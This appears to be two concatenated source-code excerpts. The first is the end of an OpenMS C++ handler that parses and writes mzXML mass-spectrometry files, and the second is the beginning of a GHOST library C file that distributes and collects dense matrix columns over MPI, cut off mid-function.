exp_->getInstrument().getSoftware().setVersion(attributeAsString_(attributes, s_version_));
exp_->getInstrument().getSoftware().setName(attributeAsString_(attributes, s_name_));
}
}
else if (tag == "peaks")
{
//precision
spectrum_data_.back().precision_ = "32";
optionalAttributeAsString_(spectrum_data_.back().precision_, attributes, s_precision_);
if (spectrum_data_.back().precision_ != "32" && spectrum_data_.back().precision_ != "64")
{
error(LOAD, String("Invalid precision '") + spectrum_data_.back().precision_ + "' in element 'peaks'");
}
//byte order
String byte_order = "network";
optionalAttributeAsString_(byte_order, attributes, s_byteorder_);
if (byte_order != "network")
{
error(LOAD, String("Invalid or missing byte order '") + byte_order + "' in element 'peaks'. Must be 'network'!");
}
//pair order
String pair_order = "m/z-int";
optionalAttributeAsString_(pair_order, attributes, s_pairorder_);
if (pair_order != "m/z-int")
{
error(LOAD, String("Invalid or missing pair order '") + pair_order + "' in element 'peaks'. Must be 'm/z-int'!");
}
//compressionType
spectrum_data_.back().compressionType_ = "none";
optionalAttributeAsString_(spectrum_data_.back().compressionType_, attributes, s_compressionType_);
if (spectrum_data_.back().compressionType_ != "none" && spectrum_data_.back().compressionType_ != "zlib")
{
error(LOAD, String("Invalid compression type ") + spectrum_data_.back().compressionType_ + "in elements 'peaks'. Must be 'none' or 'zlib'! ");
}
}
else if (tag == "precursorMz")
{
//add new precursor
spectrum_data_.back().spectrum.getPrecursors().push_back(Precursor());
//intensity
try
{
spectrum_data_.back().spectrum.getPrecursors().back().setIntensity(attributeAsDouble_(attributes, s_precursorintensity_));
}
catch (Exception::ParseError& /*e*/)
{
error(LOAD, "Mandatory attribute 'precursorIntensity' of tag 'precursorMz' not found! Setting precursor intensity to zero!");
}
//charge
Int charge = 0;
if (optionalAttributeAsInt_(charge, attributes, s_precursorcharge_))
{
spectrum_data_.back().spectrum.getPrecursors().back().setCharge(charge);
}
//window bounds (the full width is temporarily stored in the lower offset; it is split and centered once the precursor m/z is parsed)
double window = 0.0;
if (optionalAttributeAsDouble_(window, attributes, s_windowwideness_))
{
spectrum_data_.back().spectrum.getPrecursors().back().setIsolationWindowLowerOffset(window);
}
}
else if (tag == "scan")
{
skip_spectrum_ = false;
nesting_level_++;
if (options_.getMetadataOnly())
throw EndParsingSoftly(__FILE__, __LINE__, __PRETTY_FUNCTION__);
// check if the scan is in the desired MS / RT range
UInt ms_level = attributeAsInt_(attributes, s_mslevel_);
if (ms_level == 0)
{
warning(LOAD, String("Invalid 'msLevel' attribute with value '0' in 'scan' element found. Assuming ms level 1!"));
ms_level = 1;
}
//parse retention time and convert it from xs:duration to seconds
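//e.g. retentionTime="PT2H30M5.5S" yields 2*3600 + 30*60 + 5.5 = 9005.5 seconds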
double retention_time = 0.0;
String time_string = "";
if (optionalAttributeAsString_(time_string, attributes, s_retentiontime_))
{
time_string = time_string.suffix('T');
//std::cout << "Initial trim: " << time_string << "\n";
if (time_string.has('H'))
{
retention_time += 3600 * asDouble_(time_string.prefix('H'));
time_string = time_string.suffix('H');
//std::cout << "After H: " << time_string << "\n";
}
if (time_string.has('M'))
{
retention_time += 60 * asDouble_(time_string.prefix('M'));
time_string = time_string.suffix('M');
//std::cout << "After M: " << time_string << "\n";
}
if (time_string.has('S'))
{
retention_time += asDouble_(time_string.prefix('S'));
time_string = time_string.suffix('S');
//std::cout << "After S: " << time_string << "\n";
}
}
logger_.setProgress(scan_count_);
if ((options_.hasRTRange() && !options_.getRTRange().encloses(DPosition<1>(retention_time)))
|| (options_.hasMSLevels() && !options_.containsMSLevel(ms_level))
|| options_.getSizeOnly())
{
// skip this tag
skip_spectrum_ = true;
++scan_count_;
return;
}
// Add a new spectrum, initialize and set MS level and RT
spectrum_data_.resize(spectrum_data_.size() + 1); // TODO !!
spectrum_data_.back().peak_count_ = 0;
spectrum_data_.back().spectrum.setMSLevel(ms_level);
spectrum_data_.back().spectrum.setRT(retention_time);
spectrum_data_.back().spectrum.setNativeID(String("scan=") + attributeAsString_(attributes, s_num_));
//peak count == twice the scan size
spectrum_data_.back().peak_count_ = attributeAsInt_(attributes, s_peakscount_);
spectrum_data_.back().spectrum.reserve(spectrum_data_.back().peak_count_ / 2 + 1);
spectrum_data_.back().spectrum.setDataProcessing(data_processing_);
//centroided, chargeDeconvoluted, deisotoped, collisionEnergy are ignored
//other optional attributes
ScanWindow window;
optionalAttributeAsDouble_(window.begin, attributes, s_startmz_);
optionalAttributeAsDouble_(window.end, attributes, s_endmz_);
if (window.begin != 0.0 || window.end != 0.0)
{
spectrum_data_.back().spectrum.getInstrumentSettings().getScanWindows().push_back(window);
}
String polarity = "any";
optionalAttributeAsString_(polarity, attributes, s_polarity_);
spectrum_data_.back().spectrum.getInstrumentSettings().setPolarity((IonSource::Polarity) cvStringToEnum_(0, polarity, "polarity"));
// Filter string (see CV term MS:1000512 in mzML)
String filterLine = "";
optionalAttributeAsString_(filterLine, attributes, s_filterline_);
if (!filterLine.empty())
{
spectrum_data_.back().spectrum.setMetaValue("filter string", filterLine);
}
String type = "";
optionalAttributeAsString_(type, attributes, s_scantype_);
if (type == "")
{
//unknown/unset => do nothing here => no warning in the end
}
else if (type == "zoom")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setZoomScan(true);
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "Full")
{
if (ms_level > 1)
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MSNSPECTRUM);
else
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "SIM")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::SIM);
}
else if (type == "SRM" || type == "MRM")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::SRM);
}
else if (type == "CRM")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::CRM);
}
else if (type == "Q1")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "Q3")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "EMS") //Non-standard type: Enhanced MS (ABI - Sashimi converter)
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "EPI") //Non-standard type: Enhanced Product Ion (ABI - Sashimi converter)
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
spectrum_data_.back().spectrum.setMSLevel(2);
}
else if (type == "ER") // Non-standard type: Enhanced Resolution (ABI - Sashimi converter)
{
spectrum_data_.back().spectrum.getInstrumentSettings().setZoomScan(true);
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
warning(LOAD, String("Unknown scan mode '") + type + "'. Assuming full scan");
}
++scan_count_;
}
else if (tag == "operator")
{
exp_->getContacts().resize(1);
exp_->getContacts().back().setFirstName(attributeAsString_(attributes, s_first_));
exp_->getContacts().back().setLastName(attributeAsString_(attributes, s_last_));
String tmp = "";
optionalAttributeAsString_(tmp, attributes, s_email_);
exp_->getContacts().back().setEmail(tmp);
tmp = "";
optionalAttributeAsString_(tmp, attributes, s_phone_);
if (tmp != "")
{
exp_->getContacts().back().setMetaValue("#phone", tmp);
}
tmp = "";
optionalAttributeAsString_(tmp, attributes, s_uri_);
exp_->getContacts().back().setURL(tmp);
}
else if (tag == "msManufacturer")
{
exp_->getInstrument().setVendor(attributeAsString_(attributes, s_value_));
}
else if (tag == "msModel")
{
exp_->getInstrument().setModel(attributeAsString_(attributes, s_value_));
}
else if (tag == "msIonisation")
{
exp_->getInstrument().getIonSources().resize(1);
exp_->getInstrument().getIonSources()[0].setIonizationMethod((IonSource::IonizationMethod) cvStringToEnum_(2, attributeAsString_(attributes, s_value_), "msIonization"));
}
else if (tag == "msMassAnalyzer")
{
exp_->getInstrument().getMassAnalyzers().resize(1);
exp_->getInstrument().getMassAnalyzers()[0].setType((MassAnalyzer::AnalyzerType) cvStringToEnum_(3, attributeAsString_(attributes, s_value_), "msMassAnalyzer"));
}
else if (tag == "msDetector")
{
exp_->getInstrument().getIonDetectors().resize(1);
exp_->getInstrument().getIonDetectors()[0].setType((IonDetector::Type) cvStringToEnum_(4, attributeAsString_(attributes, s_value_), "msDetector"));
}
else if (tag == "msResolution")
{
exp_->getInstrument().getMassAnalyzers()[0].setResolutionMethod((MassAnalyzer::ResolutionMethod) cvStringToEnum_(5, attributeAsString_(attributes, s_value_), "msResolution"));
}
else if (tag == "dataProcessing")
{
data_processing_.push_back( DataProcessingPtr(new DataProcessing));
String boolean = "";
optionalAttributeAsString_(boolean, attributes, s_deisotoped_);
if (boolean == "true" || boolean == "1")
{
data_processing_.back()->getProcessingActions().insert(DataProcessing::DEISOTOPING);
}
boolean = "";
optionalAttributeAsString_(boolean, attributes, s_chargedeconvoluted_);
if (boolean == "true" || boolean == "1")
{
data_processing_.back()->getProcessingActions().insert(DataProcessing::CHARGE_DECONVOLUTION);
}
double cutoff = 0.0;
optionalAttributeAsDouble_(cutoff, attributes, s_intensitycutoff_);
if (cutoff != 0.0)
{
data_processing_.back()->setMetaValue("#intensity_cutoff", cutoff);
}
boolean = "";
optionalAttributeAsString_(boolean, attributes, s_centroided_);
if (boolean == "true" || boolean == "1")
{
data_processing_.back()->getProcessingActions().insert(DataProcessing::PEAK_PICKING);
}
}
else if (tag == "nameValue")
{
String name = "";
optionalAttributeAsString_(name, attributes, s_name_);
if (name == "")
return;
String value = "";
optionalAttributeAsString_(value, attributes, s_value_);
String& parent_tag = *(open_tags_.end() - 2);
if (parent_tag == "msInstrument")
{
exp_->getInstrument().setMetaValue(name, value);
}
else if (parent_tag == "scan")
{
spectrum_data_.back().spectrum.setMetaValue(name, value);
}
else
{
std::cout << " Warning: Unexpected tag 'nameValue' in tag '" << parent_tag << "'" << "\n";
}
}
else if (tag == "processingOperation")
{
String name = "";
optionalAttributeAsString_(name, attributes, s_name_);
if (name == "")
return;
String value = "";
optionalAttributeAsString_(value, attributes, s_value_);
data_processing_.back()->setMetaValue(name, value);
}
//std::cout << " -- !Start -- " << "\n";
}
template <typename MapType>
void MzXMLHandler<MapType>::endElement(const XMLCh* const /*uri*/, const XMLCh* const /*local_name*/, const XMLCh* const qname)
{
OPENMS_PRECONDITION(nesting_level_ >= 0, "Nesting level needs to be zero or more")
//std::cout << " -- End -- " << sm_.convert(qname) << " -- " << "\n";
static const XMLCh* s_mzxml = xercesc::XMLString::transcode("mzXML");
static const XMLCh* s_scan = xercesc::XMLString::transcode("scan");
open_tags_.pop_back();
if (equal_(qname, s_mzxml))
{
// Flush the remaining data
populateSpectraWithData_();
// End of mzXML
logger_.endProgress();
}
else if (equal_(qname, s_scan))
{
// End of scan: go up one nesting level
// Check whether to populate spectra when on highest nesting level
nesting_level_--;
OPENMS_PRECONDITION(nesting_level_ >= 0, "Nesting level needs to be zero or more")
if (nesting_level_ == 0 && spectrum_data_.size() >= options_.getMaxDataPoolSize())
{
populateSpectraWithData_();
}
}
//std::cout << " -- End -- " << "\n";
sm_.clear();
}
template <typename MapType>
void MzXMLHandler<MapType>::characters(const XMLCh* const chars, const XMLSize_t length)
{
//Abort if this spectrum should be skipped
if (skip_spectrum_)
return;
if (open_tags_.back() == "peaks")
{
//chars may be split to several chunks => concatenate them
if (options_.getFillData())
{
// Since we convert a Base64 string here, it can only contain plain ASCII
sm_.appendASCII(chars, length, spectrum_data_.back().char_rest_);
}
}
else if (open_tags_.back() == "offset" || open_tags_.back() == "indexOffset" || open_tags_.back() == "sha1")
{
}
else if (open_tags_.back() == "precursorMz")
{
char* transcoded_chars = sm_.convert(chars);
double mz_pos = asDouble_(transcoded_chars);
//precursor m/z
spectrum_data_.back().spectrum.getPrecursors().back().setMZ(mz_pos);
//update window bounds - center them around the m/z pos
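//e.g. a stored windowWideness of 4.0 becomes lower/upper offsets of 2.0 each around the precursor m/z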
double window_width = spectrum_data_.back().spectrum.getPrecursors().back().getIsolationWindowLowerOffset();
if (window_width != 0.0)
{
spectrum_data_.back().spectrum.getPrecursors().back().setIsolationWindowLowerOffset(0.5 * window_width);
spectrum_data_.back().spectrum.getPrecursors().back().setIsolationWindowUpperOffset(0.5 * window_width);
}
}
else if (open_tags_.back() == "comment")
{
char* transcoded_chars = sm_.convert(chars);
String parent_tag = *(open_tags_.end() - 2);
//std::cout << "- Comment of parent " << parent_tag << "\n";
if (parent_tag == "msInstrument")
{
exp_->getInstrument().setMetaValue("#comment", String(transcoded_chars));
}
else if (parent_tag == "dataProcessing")
{
//this is currently ignored
}
else if (parent_tag == "scan")
{
spectrum_data_.back().spectrum.setComment(transcoded_chars);
}
else if (String(transcoded_chars).trim() != "")
{
warning(LOAD, String("Unhandled comment '") + transcoded_chars + "' in element '" + open_tags_.back() + "'");
}
}
else
{
char* transcoded_chars = sm_.convert(chars);
if (String(transcoded_chars).trim() != "")
{
warning(LOAD, String("Unhandled character content '") + transcoded_chars + "' in element '" + open_tags_.back() + "'");
}
}
}
template <typename MapType>
void MzXMLHandler<MapType>::writeTo(std::ostream& os)
{
//determine how many spectra there are (count only those with peaks)
UInt count_tmp_ = 0;
for (Size s = 0; s < cexp_->size(); s++)
{
const SpectrumType& spec = (*cexp_)[s];
if (spec.size() != 0)
++count_tmp_;
}
if (count_tmp_ == 0)
++count_tmp_;
logger_.startProgress(0, cexp_->size(), "storing mzXML file");
os << "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n"
<< "<mzXML xmlns=\"http://sashimi.sourceforge.net/schema_revision/mzXML_2.1\" "
<< "xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" "
<< "xsi:schemaLocation=\"http://sashimi.sourceforge.net/schema_revision/mzXML_2.1 "
<< "http://sashimi.sourceforge.net/schema_revision/mzXML_2.1/mzXML_idx_2.1.xsd\">\n"
<< "\t<msRun scanCount=\"" << count_tmp_ << "\">\n";
//----------------------------------------------------------------------------------------
// parent files
//----------------------------------------------------------------------------------------
if (cexp_->getSourceFiles().empty())
{
os << "\t\t<parentFile fileName=\"\" fileType=\"processedData\" fileSha1=\"0000000000000000000000000000000000000000\"/>\n";
}
else
{
for (Size i = 0; i < cexp_->getSourceFiles().size(); ++i)
{
const SourceFile& sf = cexp_->getSourceFiles()[i];
os << "\t\t<parentFile fileName=\"" << sf.getNameOfFile() << "\" fileType=\"";
//file type is an enum in mzXML => search for 'raw' string
String tmp_string = sf.getFileType();
tmp_string.toLower();
if (tmp_string.hasSubstring("raw"))
{
os << "RAWData";
}
else
{
os << "processedData";
}
//Sha1 checksum must have 40 characters => create a fake if it is unknown
os << "\" fileSha1=\"";
tmp_string = sf.getChecksum();
if (sf.getChecksum().size() != 40 || sf.getChecksumType() != SourceFile::SHA1)
{
os << "0000000000000000000000000000000000000000";
}
else
{
os << sf.getChecksum();
}
os << "\"/>\n";
}
}
//----------------------------------------------------------------------------------------
//instrument
//----------------------------------------------------------------------------------------
if (cexp_->getInstrument() != Instrument() || cexp_->getContacts().size() != 0)
{
const Instrument& inst = cexp_->getInstrument();
os << "\t\t<msInstrument>\n"
<< "\t\t\t<msManufacturer category=\"msManufacturer\" value=\"" << inst.getVendor() << "\"/>\n" << "\t\t\t<msModel category=\"msModel\" value=\"" << inst.getModel() << "\"/>\n";
if (inst.getIonSources().empty() || !inst.getIonSources()[0].getIonizationMethod())
{
os << "\t\t\t<msIonisation category=\"msIonisation\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msIonisation category=\"msIonisation\" value=\"" << cv_terms_[2][inst.getIonSources()[0].getIonizationMethod()] << "\"/>\n";
}
const std::vector<MassAnalyzer>& analyzers = inst.getMassAnalyzers();
if (analyzers.empty() || !analyzers[0].getType()) // guard on the analyzer type that is actually written below
{
os << "\t\t\t<msMassAnalyzer category=\"msMassAnalyzer\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msMassAnalyzer category=\"msMassAnalyzer\" value=\"" << cv_terms_[3][analyzers[0].getType()] << "\"/>\n";
}
if (inst.getIonDetectors().empty() || !inst.getIonDetectors()[0].getType())
{
os << "\t\t\t<msDetector category=\"msDetector\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msDetector category=\"msDetector\" value=\"" << cv_terms_[4][inst.getIonDetectors()[0].getType()] << "\"/>\n";
}
os << "\t\t\t<software type=\"acquisition\" name=\"" << inst.getSoftware().getName() << "\" version=\"" << inst.getSoftware().getVersion() << "\"/>\n";
if (analyzers.empty() || !analyzers[0].getResolutionMethod())
{
os << "\t\t\t<msResolution category=\"msResolution\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msResolution category=\"msResolution\" value=\"" << cv_terms_[5][analyzers[0].getResolutionMethod()] << "\"/>\n";
}
if (cexp_->getContacts().size() > 0)
{
const ContactPerson& cont = cexp_->getContacts()[0];
os << "\t\t\t<operator first=\"" << cont.getFirstName() << "\" last=\"" << cont.getLastName() << "\"";
if (cont.getEmail() != "")
{
os << " email=\"" << cont.getEmail() << "\"";
}
if (cont.getURL() != "")
{
os << " URI=\"" << cont.getURL() << "\"";
}
if (cont.metaValueExists("#phone"))
{
os << " phone=\"" << writeXMLEscape(cont.getMetaValue("#phone").toString()) << "\"";
}
os << "/>\n";
}
writeUserParam_(os, inst, 3);
if (inst.metaValueExists("#comment"))
{
os << "\t\t\t<comment>" << writeXMLEscape(inst.getMetaValue("#comment")) << "</comment>\n";
}
os << "\t\t</msInstrument>\n";
}
//----------------------------------------------------------------------------------------
//data processing (the information of the first spectrum is assigned to the whole file)
//----------------------------------------------------------------------------------------
if (cexp_->size() == 0 || (*cexp_)[0].getDataProcessing().empty())
{
os << "\t\t<dataProcessing>\n"
<< "\t\t\t<software type=\"processing\" name=\"\" version=\"\"/>\n"
<< "\t\t</dataProcessing>\n";
}
else
{
for (Size i = 0; i < (*cexp_)[0].getDataProcessing().size(); ++i)
{
const DataProcessing& data_processing = * (*cexp_)[0].getDataProcessing()[i].get();
os << "\t\t<dataProcessing deisotoped=\""
<< data_processing.getProcessingActions().count(DataProcessing::DEISOTOPING)
<< "\" chargeDeconvoluted=\""
<< data_processing.getProcessingActions().count(DataProcessing::CHARGE_DECONVOLUTION)
<< "\" centroided=\""
<< data_processing.getProcessingActions().count(DataProcessing::PEAK_PICKING)
<< "\"";
if (data_processing.metaValueExists("#intensity_cutoff"))
{
os << " intensityCutoff=\"" << writeXMLEscape(data_processing.getMetaValue("#intensity_cutoff").toString()) << "\"";
}
os << ">\n"
<< "\t\t\t<software type=\"";
if (data_processing.metaValueExists("#type"))
{
os << writeXMLEscape(data_processing.getMetaValue("#type").toString());
}
else
{
os << "processing";
}
os << "\" name=\"" << data_processing.getSoftware().getName()
<< "\" version=\"" << data_processing.getSoftware().getVersion();
if (data_processing.getCompletionTime() != DateTime())
{
os << "\" completionTime=\"" << data_processing.getCompletionTime().get().substitute(' ', 'T');
}
os << "\"/>\n";
writeUserParam_(os, data_processing, 3, "processingOperation");
os << "\t\t</dataProcessing>\n";
}
}
//check if the nativeID of all spectra are numbers or numbers prefixed with 'scan='
//If not we need to renumber all spectra.
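//e.g. nativeIDs like "scan=17" or "42" can be reused as scan numbers; an ID like "sample1_spectrum17" forces renumbering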
bool all_numbers = true;
bool all_empty = true;
bool all_prefixed_numbers = true;
for (Size s = 0; s < cexp_->size(); s++)
{
String native_id = (*cexp_)[s].getNativeID();
if (!native_id.hasPrefix("scan="))
{
all_prefixed_numbers = false;
}
else
{
native_id = native_id.substr(5);
}
try
{
native_id.toInt();
}
catch (Exception::ConversionError&)
{
all_numbers = false;
all_prefixed_numbers = false;
if (native_id != "")
{
all_empty = false;
}
}
}
//If we need to renumber and the nativeIDs were not empty, warn the user
if (!all_numbers && !all_empty)
{
warning(STORE, "Not all spectrum native IDs are numbers or correctly prefixed with 'scan='. The spectra are renumbered and the native IDs are lost!");
}
// write scans
std::stack<UInt> open_scans;
for (Size s = 0; s < cexp_->size(); s++)
{
logger_.setProgress(s);
const SpectrumType& spec = (*cexp_)[s];
UInt ms_level = spec.getMSLevel();
open_scans.push(ms_level);
Size spectrum_id = s + 1;
if (all_prefixed_numbers)
{
spectrum_id = spec.getNativeID().substr(5).toInt();
}
else if (all_numbers)
{
spectrum_id = spec.getNativeID().toInt();
}
os << String(ms_level + 1, '\t')
<< "<scan num=\"" << spectrum_id << "\" msLevel=\""
<< ms_level << "\" peaksCount=\""
<< spec.size() << "\" polarity=\"";
if (spec.getInstrumentSettings().getPolarity() == IonSource::POSITIVE)
{
os << "+";
}
else if (spec.getInstrumentSettings().getPolarity() == IonSource::NEGATIVE)
{
os << "-";
}
else
{
os << "any";
}
//scan type
switch (spec.getInstrumentSettings().getScanMode())
{
case InstrumentSettings::UNKNOWN:
break;
case InstrumentSettings::MASSSPECTRUM:
case InstrumentSettings::MS1SPECTRUM:
case InstrumentSettings::MSNSPECTRUM:
if (spec.getInstrumentSettings().getZoomScan())
{
os << "\" scanType=\"zoom";
}
else
{
os << "\" scanType=\"Full";
}
break;
case InstrumentSettings::SIM:
os << "\" scanType=\"SIM";
break;
case InstrumentSettings::SRM:
os << "\" scanType=\"SRM";
break;
case InstrumentSettings::CRM:
os << "\" scanType=\"CRM";
break;
default:
os << "\" scanType=\"Full";
warning(STORE, String("Scan type '") + InstrumentSettings::NamesOfScanMode[spec.getInstrumentSettings().getScanMode()] + "' not supported by mzXML. Using 'Full' scan mode!");
}
// filter line
if (spec.metaValueExists("filter string") )
{
os << "\" filterLine=\"";
os << writeXMLEscape ( (String)spec.getMetaValue("filter string") );
}
// base peak mz (used by some programs like MAVEN), according to xsd:
// "m/z of the base peak (most intense peak)"
os << "\" basePeakMz=\"";
double basePeakInt = 0;
double basePeakMz = 0;
for (Size j = 0; j < spec.size(); j++)
{
if (spec[j].getIntensity() > basePeakInt)
{
basePeakInt = spec[j].getIntensity();
basePeakMz = spec[j].getMZ();
}
}
os << basePeakMz;
// retention time
os << "\" retentionTime=\"";
if (spec.getRT() < 0)
os << "-";
os << "PT" << std::fabs(spec.getRT()) << "S\"";
if (!spec.getInstrumentSettings().getScanWindows().empty())
{
os << " startMz=\"" << spec.getInstrumentSettings().getScanWindows()[0].begin << "\" endMz=\"" << spec.getInstrumentSettings().getScanWindows()[0].end << "\"";
}
if (spec.getInstrumentSettings().getScanWindows().size() > 1)
{
warning(STORE, "The MzXML format can store only one scan window for each scan. Only the first one is stored!");
}
// end of "scan" attributes
os << ">\n";
for (Size i = 0; i < spec.getPrecursors().size(); ++i)
{
const Precursor& precursor = spec.getPrecursors()[i];
//intensity
os << String(ms_level + 2, '\t') << "<precursorMz precursorIntensity=\"" << precursor.getIntensity();
//charge
if (precursor.getCharge() != 0)
os << "\" precursorCharge=\"" << precursor.getCharge();
//window size
if (precursor.getIsolationWindowLowerOffset() + precursor.getIsolationWindowUpperOffset() > 0.0)
os << "\" windowWideness=\"" << (precursor.getIsolationWindowUpperOffset() + precursor.getIsolationWindowLowerOffset());
//m/z
os << "\">" << precursor.getMZ() << "</precursorMz>\n";
}
if (!spec.empty())
{
os << String(ms_level + 2, '\t') << "<peaks precision=\"32\"" << " byteOrder=\"network\" pairOrder=\"m/z-int\">";
//std::cout << "Writing scan " << s << "\n";
std::vector<float> tmp;
for (Size i = 0; i < spec.size(); i++)
{
tmp.push_back(spec[i].getMZ());
tmp.push_back(spec[i].getIntensity());
}
String encoded;
decoder_.encode(tmp, Base64::BYTEORDER_BIGENDIAN, encoded);
os << encoded << "</peaks>\n";
}
else
{
os << String(ms_level + 2, '\t') << "<peaks precision=\"32\"" << " byteOrder=\"network\" pairOrder=\"m/z-int\" xsi:nil=\"true\"/>\n";
}
writeUserParam_(os, spec, ms_level + 2);
if (spec.getComment() != "")
{
os << String(ms_level + 2, '\t') << "<comment>" << spec.getComment() << "</comment>\n";
}
//check MS level of next scan and close scans (scans can be nested)
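//e.g. an MS1 scan stays open while its MS2 children are written; it is closed once the next scan's level drops back to 1 or below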
UInt next_ms_level = 0;
if (s < cexp_->size() - 1)
{
next_ms_level = ((*cexp_)[s + 1]).getMSLevel();
}
//std::cout << "scan: " << s << " this: " << ms_level << " next: " << next_ms_level << "\n";
if (next_ms_level <= ms_level)
{
for (Size i = 0; i <= ms_level - next_ms_level && !open_scans.empty(); ++i)
{
os << String(ms_level - i + 1, '\t') << "</scan>\n";
open_scans.pop();
}
}
}
os << "\t</msRun>\n"
<< "\t<indexOffset>0</indexOffset>\n"
<< "</mzXML>\n";
logger_.endProgress();
spec_write_counter_ = 1;
}
} // namespace Internal
} // namespace OpenMS
#endif
|
densemat_cm.c | #define _XOPEN_SOURCE 500
#include "ghost/config.h"
#include "ghost/types.h"
#include "ghost/core.h"
#include "ghost/datatransfers.h"
#include "ghost/densemat_cm.h"
#include "ghost/util.h"
#include "ghost/locality.h"
#include "ghost/context.h"
#include "ghost/instr.h"
#include "ghost/machine.h"
#include "ghost/log.h"
#include "ghost/bindensemat.h"
#include "ghost/densemat_rm.h"
#include "ghost/constants.h"
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#ifdef GHOST_HAVE_CUDA
#include <cuda_runtime.h>
#endif
#define COLMAJOR
#include "ghost/densemat_iter_macros.h"
#include "ghost/densemat_common.c.def"
ghost_error ghost_densemat_cm_distributeVector(ghost_densemat *vec, ghost_densemat *nodeVec, ghost_context *ctx)
{
GHOST_DEBUG_LOG(1,"Distributing vector");
int me;
int nprocs;
GHOST_CALL_RETURN(ghost_rank(&me, ctx->mpicomm));
GHOST_CALL_RETURN(ghost_nrank(&nprocs, ctx->mpicomm));
bool uniformstorage;
GHOST_CALL_RETURN(ghost_densemat_uniformstorage(&uniformstorage,vec,ctx->mpicomm));
if (!uniformstorage) {
GHOST_ERROR_LOG("Cannot collect vectors of different storage order");
return GHOST_ERR_INVALID_ARG;
}
ghost_lidx c;
#ifdef GHOST_HAVE_MPI
GHOST_DEBUG_LOG(2,"Scattering global vector to local vectors");
ghost_mpi_datatype mpidt;
GHOST_CALL_RETURN(ghost_mpi_datatype_get(&mpidt,vec->traits.datatype));
int i;
MPI_Request req[vec->traits.ncols*2*(nprocs-1)];
MPI_Status stat[vec->traits.ncols*2*(nprocs-1)];
int msgcount = 0;
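/* worst case one message per column to/from every other rank; unused slots
 * stay MPI_REQUEST_NULL and only the first msgcount requests are waited on */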
for (i=0;i<vec->traits.ncols*2*(nprocs-1);i++)
req[i] = MPI_REQUEST_NULL;
if (me != 0) {
for (c=0; c<vec->traits.ncols; c++) {
MPI_CALL_RETURN(MPI_Irecv(DENSEMAT_VALPTR(nodeVec,0,c),ctx->row_map->ldim[me],mpidt,0,me,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
} else {
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(nodeVec,0,c),DENSEMAT_VALPTR(vec,0,c),vec->elSize*ctx->row_map->ldim[0]);
for (i=1;i<nprocs;i++) {
MPI_CALL_RETURN(MPI_Isend(DENSEMAT_VALPTR(vec,ctx->row_map->goffs[i],c),ctx->row_map->ldim[i],mpidt,i,i,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
}
}
MPI_CALL_RETURN(MPI_Waitall(msgcount,req,stat));
#else
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(nodeVec,0,c),DENSEMAT_VALPTR(vec,0,c),DM_NROWS(vec)*vec->elSize);
}
// *nodeVec = vec->clone(vec);
#endif
ghost_densemat_upload(nodeVec);
GHOST_DEBUG_LOG(1,"Vector distributed successfully");
return GHOST_SUCCESS;
}
ghost_error ghost_densemat_cm_collectVectors(ghost_densemat *vec, ghost_densemat *totalVec, ghost_context *ctx)
{
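/* inverse of distributeVector: every rank sends its chunk of each column to
 * rank 0, which assembles them into totalVec at the global row offsets */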
#ifdef GHOST_HAVE_MPI
int me;
ghost_lidx c;
int nprocs;
ghost_mpi_datatype mpidt;
GHOST_CALL_RETURN(ghost_rank(&me, ctx->mpicomm));
GHOST_CALL_RETURN(ghost_nrank(&nprocs, ctx->mpicomm));
GHOST_CALL_RETURN(ghost_mpi_datatype_get(&mpidt,vec->traits.datatype));
bool uniformstorage;
GHOST_CALL_RETURN(ghost_densemat_uniformstorage(&uniformstorage,vec,ctx->mpicomm));
if (!uniformstorage) {
GHOST_ERROR_LOG("Cannot collect vectors of different storage order");
return GHOST_ERR_INVALID_ARG;
}
// if (ctx != NULL)
// vec->permute(vec,ctx->invRowPerm);
int i;
MPI_Request req[vec->traits.ncols*2*(nprocs-1)];
MPI_Status stat[vec->traits.ncols*2*(nprocs-1)];
int msgcount = 0;
for (i=0;i<vec->traits.ncols*2*(nprocs-1);i++) {
req[i] = MPI_REQUEST_NULL;
}
if (me != 0) {
for (c=0; c<vec->traits.ncols; c++) {
MPI_CALL_RETURN(MPI_Isend(DENSEMAT_VALPTR(vec,0,c),ctx->row_map->ldim[me],mpidt,0,me,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
} else {
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(totalVec,0,c),DENSEMAT_VALPTR(vec,0,c),vec->elSize*ctx->row_map->ldim[0]);
for (i=1;i<nprocs;i++) {
MPI_CALL_RETURN(MPI_Irecv(DENSEMAT_VALPTR(totalVec,ctx->row_map->goffs[i],c),ctx->row_map->ldim[i],mpidt,i,i,ctx->mpicomm,&req[msgcount]));
